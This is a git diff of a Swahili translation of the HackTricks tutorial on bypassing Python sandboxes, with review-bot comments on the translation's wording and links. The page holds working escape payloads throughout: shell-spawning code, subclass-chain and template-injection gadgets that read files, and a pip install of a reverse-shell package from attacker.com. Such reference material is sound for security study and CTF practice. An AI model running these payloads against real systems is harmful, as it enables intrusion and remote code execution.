mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['', 'src/network-services-pentesting/pentesting-web/django.m
This commit is contained in:
parent
7679635e24
commit
7ac2766567
@ -1,12 +1,12 @@
# Bypass Python sandboxes
# Kuvuka Python sandboxes
{{#include ../../../banners/hacktricks-training.md}}
Hizi ni baadhi ya mbinu za bypass python sandbox protections na execute arbitrary commands.
Hizi ni mbinu kadhaa za kuvuka ulinzi wa Python sandboxes na kutekeleza amri yoyote.
## Command Execution Libraries
## Maktaba za Utekelezaji wa Amri
Jambo la kwanza unalopaswa kujua ni kama unaweza directly execute code kwa kutumia baadhi ya library ambazo tayari zimeimport, au kama unaweza import yoyote ya library hizi:
Jambo la kwanza unalopaswa kujua ni kama unaweza kutekeleza code moja kwa moja kwa kutumia library ambayo tayari imeimportwa, au kama unaweza kuimport yoyote ya maktaba hizi:
```python
os.system("ls")
os.popen("ls").read()
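Review bot: the new title `# Kuvuka Python sandboxes` changes the page's generated slug, while the file's own in-page links (`#python-execution-without-calls`, `#recursive-search-of-builtins-globals`, seen later in this diff) still use English slugs; if headings are translated, the link targets in the same file need updating in the same commit or the links stay broken.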
@ -39,21 +39,21 @@ open('/var/www/html/input', 'w').write('123')
execfile('/usr/lib/python2.7/os.py')
system('ls')
```
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu kwa **kusoma faili** ndani ya python sandbox na kwa **kuandika baadhi ya code** ambayo unaweza **kuitekeleza** ili **bypass** sandbox.
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu ili **read files** ndani ya python sandbox na ili **write some code** ambayo unaweza **execute** ili **bypass** the sandbox.
> [!CAUTION] > **Python2 input()** function inaruhusu kutekeleza code ya python kabla programu ianguke.
> [!CAUTION] > **Python2 input()** function inaruhusu kutekeleza python code kabla programu inavyoanguka.
Python hujaribu **kupakia maktaba kutoka directory ya sasa kwanza** (amri ifuatayo itaonyesha wapi python inapakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
Python inajaribu **load libraries from the current directory first** (amri ifuatayo itaonyesha mahali python inavyopakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
.png>)
## Bypass pickle sandbox kwa packages za python zilizosakinishwa kwa chaguo-msingi
## Bypass pickle sandbox with the default installed python packages
### Packages za chaguo-msingi
### Default packages
Unaweza kupata **orodha ya packages zilizowekwa tayari** hapa: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Kumbuka kwamba kutoka kwa pickle unaweza kufanya python env **import arbitrary libraries** zilizosakinishwa kwenye mfumo.\
Kwa mfano, pickle ifuatayo, itakapopakiwa, itachukua library ya pip ili kuitumia:
Unaweza kupata **list of pre-installed** packages hapa: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note kwamba kutoka kwa pickle unaweza kufanya python env **import arbitrary libraries** zilizowekwa kwenye system.\
Kwa mfano, pickle ifuatayo, inapopakuliwa, ita-import pip library ili kuitumia:
```python
#Note that here we are importing the pip library so the pickle is created correctly
#however, the victim doesn't even need to have the library installed to execute it
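Review bot: the CAUTION alert in this hunk keeps the marker and the body on one line (`> [!CAUTION] > **Python2 input()** function inaruhusu ...`), so the alert will not render; put `> [!CAUTION]` on its own line followed by `> **Python2 input()** ...`, as the `> [!TIP]` block later in this file does. The new translation also moves "kusoma faili" and "kuandika baadhi ya code" back to English ("read files", "write some code") inside an otherwise Swahili sentence; pick one language per sentence.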
@ -66,32 +66,32 @@ return (pip.main,(["list"],))
print(base64.b64encode(pickle.dumps(P(), protocol=0)))
```
Kwa maelezo zaidi kuhusu jinsi pickle inavyofanya kazi angalia hii: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
Kwa habari zaidi kuhusu jinsi pickle inavyofanya kazi angalia hii: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
### Pip package
Mbinu iliyoshirikiwa na **@isHaacK**
Ikiwa una ufikiaji wa `pip` au `pip.main()` unaweza kusakinisha kifurushi chochote na kupata reverse shell kwa kuita:
Ikiwa una ufikiaji wa `pip` au `pip.main()` unaweza kusanisha package yoyote na kupata reverse shell kwa kuita:
```bash
pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
```
Unaweza kupakua paketi ya kuunda reverse shell hapa. Tafadhali, kumbuka kwamba kabla ya kuitumia unapaswa **kunyoosha (decompress) faili, kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
Unaweza kupakua kifurushi ili kuunda reverse shell hapa. Tafadhali, kumbuka kwamba kabla ya kuitumia unapaswa **kuifungua, kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
{{#file}}
Reverse.tar (1).gz
{{#endfile}}
> [!TIP]
> Paketi hii inaitwa `Reverse`. Hata hivyo, ilitengenezwa maalum ili wakati utaondoka kwenye reverse shell usakinishaji wa mabaki utashindwa, kwa hivyo **hutaacha paketi yoyote ya ziada ya python imewekwa kwenye seva** utakapoondoka.
> Kifurushi hiki kinaitwa `Reverse`. Hata hivyo, kilitengenezwa maalum ili wakati unapoondoka kwenye reverse shell usakinishaji uliobaki utakosewa, hivyo **hutaacha python package nyingine yoyote iliyosakinishwa kwenye server** unapoondoka.
## Eval-ing python code
> [!WARNING]
> Kumbuka kwamba exec inaruhusu multiline strings na ";", lakini eval si hivyo (angalia walrus operator)
> Kumbuka kwamba exec inaruhusu multiline strings na ";", lakini eval haisiruhusu (angalia walrus operator)
Ikiwa certain characters zimetengwa unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
Ikiwa herufi fulani zimezuiliwa unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
```python
exec("print('RCE'); __import__('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
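Review bot: two typos in the new text of this hunk: "kusanisha" in "unaweza kusanisha package yoyote" should be "kusakinisha" (the old line had it right), and "haisiruhusu" in the WARNING is not a valid negative form; "lakini eval hairuhusu" is intended. "utakosewa" in the TIP also reads oddly for "will fail"; the old "utashindwa" was clearer. Separately, the unchanged context URL `http://attacker.com/Rerverse.tar.gz` spells the package "Rerverse" while the TIP names it `Reverse`; worth fixing upstream.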
@ -112,7 +112,7 @@ exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
### Maktaba nyingine zinazoruhusu eval ya python code
### Maktaba nyingine zinazoruhusu eval python code
```python
#Pandas
import pandas as pd
@ -126,15 +126,15 @@ df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")
```
Pia angalia kutoroka halisi kutoka kwa evaluator aliyowekwa kwenye sandbox katika vianzishaji vya PDF:
Pia angalia sandbox escape ya evaluator katika jenereta za PDF:
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inatumia vibaya rl_safe_eval kufikia function.__globals__ na os.system kutoka kwa sifa zilizotathminiwa (kwa mfano, rangi ya fonti) na hurudisha thamani halali ili kufanya rendering iwe thabiti.
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inatumia rl_safe_eval kufikia function.__globals__ na os.system kutoka kwa attributes zilizotathminiwa (kwa mfano, font color) na inarudisha thamani halali ili kuweka rendering thabiti.
{{#ref}}
reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
{{#endref}}
## Operatori na mbinu fupi
## Operators na mbinu fupi
```python
# walrus operator allows generating variable inside a list
## everything will be executed in order
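Review bot: the reworded CVE-2023-33733 bullet drops "vibaya", so "Inatumia rl_safe_eval kufikia function.__globals__" now reads as "uses rl_safe_eval" rather than "abuses"; keep "Inatumia vibaya rl_safe_eval" so the sentence still describes the escape rather than normal use of the evaluator.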
@ -143,9 +143,9 @@ reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
```
## Kuvunja ulinzi kupitia encodings (UTF-7)
## Kupita ulinzi kwa kutumia encodings (UTF-7)
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 inatumiwa kupakia na kutekeleza msimbo wa python wa aina yoyote ndani ya sandbox inayoonekana:
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 inatumika kupakia na kutekeleza msimbo wowote wa python ndani ya sandbox inayojionyesha:
```python
assert b"+AAo-".decode("utf_7") == "\n"
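Review bot: "UFT-7" in the new sentence "UFT-7 inatumika kupakia na kutekeleza ..." is a typo carried over from the old line; the heading in this hunk says UTF-7 and the code below decodes with `utf_7`, so fix it to UTF-7 while the line is being touched.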
@ -156,13 +156,13 @@ return x
#+AAo-print(open("/flag.txt").read())
""".lstrip()
```
Inawezekana pia kuipita kwa kutumia enkodaji nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
Pia inawezekana kupita kizuizi kwa kutumia encodings nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
## Utekelezaji wa Python bila miito
## Utekelezaji wa Python bila calls
Ikiwa uko ndani ya python jail ambayo **hainakuruhusu kufanya miito**, bado kuna njia za **execute arbitrary functions, code** na **commands**.
Ikiwa uko ndani ya python jail ambayo **doesn't allow you to make calls**, bado kuna njia za **execute arbitrary functions, code** na **commands**.
### RCE na [decorators](https://docs.python.org/3/glossary.html#term-decorator)
### RCE with [decorators](https://docs.python.org/3/glossary.html#term-decorator)
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
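Review bot: the new heading `## Utekelezaji wa Python bila calls` does not produce the slug `python-execution-without-calls` that the link `[**Python execution without calls**](#python-execution-without-calls)` later in this file still targets, so that in-page link remains broken after this change; either update the link target to the Swahili slug or give the heading an explicit id. "bila calls" also mixes languages where the old "bila miito" was already correct Swahili.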
@ -184,13 +184,13 @@ X = exec(X)
@'__import__("os").system("sh")'.format
class _:pass
```
### RCE kuunda objects na overloading
### RCE creating objects and overloading
Ikiwa unaweza **kutangaza class** na **kuunda object** ya class hiyo unaweza **kuandika/kufuta na kuandika upya methods tofauti** ambazo zinaweza **kufanyakazi** **bila** **kuhitaji kuziita moja kwa moja**.
Ikiwa unaweza **declare a class** na **create an object** ya class hiyo, unaweza **write/overwrite different methods** ambazo zinaweza ku**triggered** **without** **needing to call them directly**.
#### RCE with custom classes
Unaweza kubadilisha baadhi ya **class methods** (_kwa kuoverwrite class methods zilizopo au kuunda class mpya_) ili kuzifanya ziwe na uwezo wa **execute arbitrary code** wakati zinapokuwa **triggered** bila kuziita moja kwa moja.
Unaweza kubadilisha baadhi ya **class methods** (_by overwriting existing class methods or creating a new class_) ili kuzifanya zi**execute arbitrary code** wakati zitakapokuwa **triggered** bila kuzuita moja kwa moja.
```python
# This class has 3 different ways to trigger RCE without directly calling any function
class RCE:
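Review bot: "kuzuita" in the new line "bila kuzuita moja kwa moja" is a typo for "kuziita" (the old line had "kuziita"). The same hunk leaves the bolded phrases "declare a class", "create an object" and "write/overwrite different methods" in English inside otherwise Swahili sentences, and the split bolding "ku**triggered**" / "zi**execute arbitrary code**" glues a Swahili prefix onto an English verb; translate the sentence as a unit or leave it whole.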
@ -240,9 +240,9 @@ __iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')
```
#### Kuunda vitu kwa [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
#### Kuunda objects kwa kutumia [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
Jambo kuu ambalo metaclasses zinaturuhusu ni **kuunda instance ya class, bila kuita constructor** moja kwa moja, kwa kuunda class mpya ambapo class lengwa ni metaclass.
Jambo kuu ambalo metaclasses zinaturuhusu ni **kutengeneza instance ya class, bila kuita constructor** moja kwa moja, kwa kuunda class mpya ambayo class lengwa ni metaclass.
```python
# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
# This will define the members of the "subclass"
@ -259,7 +259,7 @@ Sub['import os; os.system("sh")']
```
#### Kuunda objects kwa exceptions
Wakati **exception inapotokea**, object ya **Exception** **imetengenezwa** bila wewe kuhitaji kuita constructor moja kwa moja (njia kutoka kwa [**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)):
Wakati **exception inapotokea** object ya **Exception** **inaundwa** bila wewe kuhitaji kuita constructor moja kwa moja (triki kutoka kwa [**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)):
```python
class RCE(Exception):
def __init__(self):
@ -279,7 +279,7 @@ k + 'import os; os.system("sh")' #RCE abusing __add__
## You can also use the tricks from the previous section to get RCE with this object
```
### Zaidi ya RCE
### Zaidi RCE
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
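Review bot: the new heading `### Zaidi RCE` is ungrammatical; Swahili places the quantifier after the noun, so "RCE zaidi" (or the old "Zaidi ya RCE") is what "More RCE" should become.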
@ -301,7 +301,7 @@ __iadd__ = eval
__builtins__.__import__ = X
{}[1337]
```
### Soma faili kwa msaada wa builtins & leseni
### Soma faili kwa builtins help & license
```python
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__.help
@ -315,17 +315,17 @@ pass
- [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
- [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
Ikiwa unaweza kupata object ya **`__builtins__`** unaweza import libraries (kumbuka kwamba unaweza pia kutumia hapa string representation nyingine zilizoonyeshwa katika sehemu ya mwisho):
Ikiwa unaweza kufikia object ya **`__builtins__`** unaweza import libraries (kumbuka kwamba unaweza pia kutumia hapa string representation nyingine iliyoonyeshwa katika sehemu ya mwisho):
```python
__builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
```
### Hakuna Builtins
Unapokosa `__builtins__` hutaweza ku-import chochote wala hata kusoma au kuandika files kwa kuwa **all the global functions** (kama `open`, `import`, `print`...) **aren't loaded**.\
Hata hivyo, **by default python imports a lot of modules in memory**. Modules hizi zinaweza kuonekana benign, lakini baadhi yao pia **zinaleta functionalities hatari** ndani yao ambazo zinaweza kufikiwa ili kupata hata **arbitrary code execution**.
Unapokosa `__builtins__` hutoweza ku-import chochote wala hata kusoma au kuandika mafaili kwa kuwa **all the global functions** (kama `open`, `import`, `print`...) **aren't loaded**.\
Hata hivyo, **by default python imports a lot of modules in memory**. Modules hizi zinaweza kuonekana **benign**, lakini baadhi yao pia zinaingiza functionalities **dangerous** ndani yao ambazo zinaweza kufikiwa ili kupata hata **arbitrary code execution**.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya modules hizi "**benign**" zilizo-pakiwa ili **kupata** **dangerous** **functionalities** ndani yao.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya hizi "**benign**" modules zilizopakiwa ili **kupata** functionalities **dangerous** ndani yao.
**Python2**
```python
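Review bot: "hutoweza" in the new line "hutoweza ku-import chochote" should be "hutaweza" as in the old line. The same paragraph keeps "all the global functions", "aren't loaded", "by default python imports a lot of modules in memory", "benign" and "dangerous" in English mid-sentence; bold markup should wrap the translated words rather than preserve the English ones.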
@ -367,7 +367,7 @@ get_flag.__globals__['__builtins__']
# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) ili kupata makumi/**mamia** ya **maeneo** ambapo unaweza kupata **builtins**.
[**Hapo chini kuna function kubwa zaidi**](#recursive-search-of-builtins-globals) ili kupata kumi/**mamia** ya **maeneo** ambako unaweza kupata **builtins**.
#### Python2 and Python3
```python
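Review bot: "kumi/**mamia**" in the new link text reads "ten/hundreds"; the old "makumi/**mamia**" (tens/hundreds) is the intended meaning, so keep "makumi". The link still targets `#recursive-search-of-builtins-globals`, the English slug, while the matching heading in this file is translated, so the anchor will not resolve.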
@ -409,15 +409,15 @@ class_obj.__init__.__globals__
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 
'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
```
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) ili kupata miongo/**mamia** ya **mahali** ambapo unaweza kupata **globals**.
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) kutafuta kumi/**mia** ya **maeneo** ambapo unaweza kupata **globals**.
## Gundua Arbitrary Execution
## Discover Arbitrary Execution
Hapa nataka kuelezea jinsi ya kugundua kwa urahisi **more dangerous functionalities loaded** na kupendekeza exploits zinazotegemewa zaidi.
Hapa nataka kuelezea jinsi ya kugundua kwa urahisi **kazi hatari zaidi zilizopakiwa** na kupendekeza exploits zenye kuaminika zaidi.
#### Accessing subclasses with bypasses
Moja ya sehemu nyeti zaidi za tekniki hii ni uwezo wa **access the base subclasses**. Katika mifano ya awali hii ilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **other possible ways**:
Moja ya sehemu nyeti zaidi za mbinu hii ni uwezo wa **access the base subclasses**. Katika mifano ya awali, hili lilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **njia nyingine zinazowezekana**:
```python
#You can access the base from mostly anywhere (in regular conditions)
"".__class__.__base__.__subclasses__()
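Review bot: "kumi/**mia**" in the new link text reads "ten/hundred"; use "makumi/**mamia**" (tens/hundreds). The same line leaves the link text "Below there is a bigger function" in English although the equivalent sentence in the previous hunk was translated ("Hapo chini kuna function kubwa zaidi"), and the heading `## Discover Arbitrary Execution` reverts the old Swahili "Gundua Arbitrary Execution" back to English; these should move in one direction, not both.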
@ -445,18 +445,18 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
### Kutafuta maktaba hatari zilizopakiwa
### Kupata maktaba hatari zilizopakiwa
Kwa mfano, ukijua kwamba kwa maktaba **`sys`** inawezekana **kuingiza maktaba yoyote**, unaweza kutafuta **moduli zilizopakiwa ambazo zimeingiza sys ndani yao**:
Kwa mfano, ukijua kwamba kwa maktaba **`sys`** inawezekana **import arbitrary libraries**, unaweza kutafuta modules zote zilizopakiwa ambazo zimeimport **`sys`** ndani yao:
```python
[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
```
Zipo nyingi, na **tunahitaji moja tu** kutekeleza amri:
Kuna nyingi, na **tunahitaji moja tu** kutekeleza amri:
```python
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
```
Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunazojua zinaweza kutumika **kutekeleza amri**:
Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunajua zinaweza kutumika **kutekeleza amri**:
```python
#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
@ -491,7 +491,7 @@ Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunazojua zinaweza
#pdb
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")
```
Zaidi ya hayo, tunaweza hata kutafuta ni moduli zipi zinapakia maktaba hatarishi:
Zaidi ya hayo, tunaweza hata kutafuta ni moduli gani zinapakia maktaba zenye madhara:
```python
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
for b in bad_libraries_names:
@ -510,7 +510,7 @@ builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalE
pdb:
"""
```
Aidha, ikiwa unadhani **maktaba nyingine** zinaweza **kuaita functions ili kutekeleza amri**, tunaweza pia **kuwachuja kwa majina ya functions** ndani ya maktaba zinazowezekana:
Zaidi ya hayo, ikiwa unaamini **other libraries** zinaweza **invoke functions to execute commands**, tunaweza pia **filter by functions names** ndani ya libraries zinazowezekana:
```python
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
@ -546,7 +546,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
## Utafutaji wa Rekursivu wa Builtins, Globals...
> [!WARNING]
> Hii ni **ajabu kabisa**. Ikiwa unatafuta **kitu kama globals, builtins, open au chochote** tumia tu script hii ili **kwa rekursivu upate maeneo ambapo unaweza kupata kitu hicho.**
> Hii ni **ajabu kabisa**. Ikiwa unatafuta **object kama globals, builtins, open au chochote**, tumia tu script hii kutafuta kwa **rekursivu maeneo ambapo unaweza kupata object hiyo.**
```python
import os, sys # Import these to find more gadgets
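Review bot: the context heading `## Utafutaji wa Rekursivu wa Builtins, Globals...` does not yield the slug `recursive-search-of-builtins-globals` that the two "bigger function" links earlier in this file point at, so those in-page links are dead; either change the link targets to the Swahili slug or add an explicit id to this heading so both languages resolve.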
@ -671,7 +671,7 @@ https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-
## Python Format String
Ikiwa utatuma **string** kwa python ambayo itafanyiwa **format**, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano iliyotangulia kufikia globals au builtins kwa mfano.
Ikiwa **utatuma** **string** kwa python ambayo **itakayofomatiwa**, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano zilizotangulia kufikia globals au builtins, kwa mfano.
```python
# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
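Review bot: "ambayo **itakayofomatiwa**" in the new sentence doubles the relative marker ("ambayo" plus the "-yo-" infix); write "ambayo itafomatiwa" or drop "ambayo". "mifano zilizotangulia" on the same line also has the wrong noun-class agreement; "mifano iliyotangulia", as in the old line, is correct.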
@ -691,11 +691,11 @@ people = PeopleInfo('GEEKS', 'FORGEEKS')
st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)
```
Angalia jinsi unaweza **kupata sifa** kwa njia ya kawaida kwa kutumia **dot** kama `people_obj.__init__` na **kipengee cha dict** kwa **mabano ya mraba** bila nukuu `__globals__[CONFIG]`
Angalia jinsi unavyoweza **kupata attributes** kwa njia ya kawaida kwa kutumia **dot** kama `people_obj.__init__` na **dict element** kwa **parenthesis** bila nukuu `__globals__[CONFIG]`
Pia kumbuka kwamba unaweza kutumia `.__dict__` kuorodhesha vipengee vya kitu `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Pia angalia kwamba unaweza kutumia `.__dict__` kuorodhesha elements za object `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Baadhi ya tabia nyingine za kuvutia za format strings ni uwezekano wa **kutekeleza** **kazi** **`str`**, **`repr`** na **`ascii`** kwenye kitu kilichotajwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** mtawalia:
Baadhi ya sifa nyingine za kuvutia za format strings ni uwezekano wa **kuendesha** **functions** **`str`**, **`repr`** na **`ascii`** kwenye object iliyotajwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** kwa mtiririko:
```python
st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)
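Review bot: the new sentence replaces "mabano ya mraba" (square brackets) with "parenthesis", but the example it describes, `__globals__[CONFIG]`, uses square brackets, so the old wording was the accurate one; keep "mabano ya mraba". The rest of the hunk ("dict element", "attributes") again drops English fragments into Swahili sentences.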
@ -711,10 +711,10 @@ return 'HAL 9000'
'{:open-the-pod-bay-doors}'.format(HAL9000())
#I'm afraid I can't do that.
```
**Mifano zaidi** kuhusu **format** **string** yanaweza kupatikana kwenye [**https://pyformat.info/**](https://pyformat.info)
**Mifano zaidi** kuhusu **format** **string** zinaweza kupatikana kwenye [**https://pyformat.info/**](https://pyformat.info)
> [!CAUTION]
> Angalia pia ukurasa ufuatao kwa gadgets zitakazoweza r**ead sensitive information from Python internal objects**:
> Angalia pia ukurasa ufuatao kwa gadgets ambazo zita**soma taarifa nyeti kutoka kwenye vitu vya ndani vya Python**:
{{#ref}}
